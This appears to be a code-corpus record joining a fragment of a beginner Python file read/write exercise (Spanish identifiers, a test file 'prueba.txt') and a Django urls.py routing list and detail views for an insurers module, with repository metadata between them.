    with open(nombre, "r") as archivo:
        texto = archivo.read()
    return texto
if __name__ == "__main__":
escribir("prueba.txt", "Un texto cualquiera")
print(leer("prueba.txt"))
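    # A possible extension (sketch): open the file in append mode instead of overwriting it,
    # e.g. with open("prueba.txt", "a") as archivo: archivo.write(" more text")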
|
[
"noreply@github.com"
] |
vpoloromero.noreply@github.com
|
bb2b6a434a7822094e49e100f57a46df36bca90e
|
57f0685e4d2dee92e57b9a7b948ad40d4f88cff6
|
/modules/Aseguradoras/urls.py
|
f3e74dc269278286ef9b21099248cb918ae5e7d0
|
[] |
no_license
|
richard020797/CARSapi
|
37ff75234f2bb1b8b73f77e19dfeb63f4ec36f62
|
cd116f2828710670a9e94058517fed6af4f12f74
|
refs/heads/master
| 2021-01-12T13:52:31.100950
| 2016-09-27T00:58:12
| 2016-09-27T00:58:12
| 69,070,777
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 220
|
py
|
from django.conf.urls import url
from .views import ListAseguradoras
from .views import DetailAseguradora
urlpatterns = [
url(r'^$', ListAseguradoras.as_view()),
url(r'^(?P<pk>[0-9]+)/$',DetailAseguradora.as_view())
]
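# Routes defined above (sketch, names inferred from the view classes):
#   /           -> ListAseguradoras (list all insurers)
#   /<pk>/      -> DetailAseguradora (detail view for a single insurer)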
|
[
"richard020797@gmail.com"
] |
richard020797@gmail.com
|